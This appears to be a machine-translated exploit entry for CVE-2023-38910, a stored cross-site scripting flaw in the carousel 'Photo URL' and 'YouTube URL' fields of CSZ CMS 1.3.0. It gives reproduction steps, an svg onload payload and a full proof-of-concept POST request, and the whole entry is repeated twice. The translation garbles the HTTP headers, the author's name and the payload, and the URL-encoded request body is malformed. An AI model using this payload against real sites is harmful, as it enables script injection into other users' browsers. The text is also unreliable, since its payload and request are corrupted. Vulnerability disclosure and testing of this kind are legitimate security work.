#利用标题: CSZ CMS 1.3.0-存储的跨站点脚本('Photo URL'和'YouTube URL')
#日期: 2023/08/18
#CVE: CVE-2023-38910
#利用作者:丹尼尔马云惹不起马云冈萨雷斯
#供应商HomePage3360 https://www.cszcms.com/
#软件link: https://github.com/cskaza/cszcms
#版本: 1.3.0
#测试在: CSZ CMS 1.3.0
#Description:
#CSZ CMS 1.3.0很容易受到跨站点脚本(XSS)的影响,该攻击者可以通过在“旋转旋转木马假象”部分中输入的精心设计的有效载荷执行任意Web脚本或HTML,并选择上面创建的Carousel窗口小工具,并在“ Photo url”和“ pother url”和“ YouTube url”插件中。
#复制存储的XSS:的步骤
转到URL http://localhost/admin/carousel。
我们编辑了我们创建的旋转木马,并发现我们可以将任意的Web脚本或HTML注入“ YouTube URL”和“ Photo URL”字段中。
我们可以注入HTML代码。
通过以下有效载荷,我们可以实现XSS。
PAYLOAD:
divp title='/divsvg/onload=alert(document.domain)'
#POC请求:
发布http://localhost:8080/admin/carousel/addurl/3 http/1.1
HOST: LOCALHOST:8080
用户-Agent: Mozilla/5.0(X11; Linux X86_64; RV:60.0)Gecko/20100101 Firefox/116.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: ES-ES,ES; Q=0.8,EN-US; q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
升级- 不肯定- requests: 1
carousel_type=multiimagesphoto_url=%3CDIV%3E%3CP+title%3D%22%22%3C%2FDDIV%3E%3CSVG%2fonload%3DALERT%28Document.Domain%29%%29%29%3E%22%3E%22%3SMIT=添加
#日期: 2023/08/18
#CVE: CVE-2023-38910
#利用作者:丹尼尔马云惹不起马云冈萨雷斯
#供应商HomePage3360 https://www.cszcms.com/
#软件link: https://github.com/cskaza/cszcms
#版本: 1.3.0
#测试在: CSZ CMS 1.3.0
#Description:
#CSZ CMS 1.3.0很容易受到跨站点脚本(XSS)的影响,该攻击者可以通过在“旋转旋转木马假象”部分中输入的精心设计的有效载荷执行任意Web脚本或HTML,并选择上面创建的Carousel窗口小工具,并在“ Photo url”和“ pother url”和“ YouTube url”插件中。
#复制存储的XSS:的步骤
转到URL http://localhost/admin/carousel。
我们编辑了我们创建的旋转木马,并发现我们可以将任意的Web脚本或HTML注入“ YouTube URL”和“ Photo URL”字段中。
我们可以注入HTML代码。
通过以下有效载荷,我们可以实现XSS。
PAYLOAD:
divp title='/divsvg/onload=alert(document.domain)'
#POC请求:
发布http://localhost:8080/admin/carousel/addurl/3 http/1.1
HOST: LOCALHOST:8080
用户-Agent: Mozilla/5.0(X11; Linux X86_64; RV:60.0)Gecko/20100101 Firefox/116.0
ACCEPT:文本/HTML,Application/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,/; q=0.8
Accept-Language: ES-ES,ES; Q=0.8,EN-US; q=0.5,en; q=0.3
Accept-incoding: Gzip,Deflate,br
content-type:应用程序/x-www-form-urlenceded
内容长度: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
升级- 不肯定- requests: 1
carousel_type=multiimagesphoto_url=%3CDIV%3E%3CP+title%3D%22%22%3C%2FDDIV%3E%3CSVG%2fonload%3DALERT%28Document.Domain%29%%29%29%3E%22%3E%22%3SMIT=添加
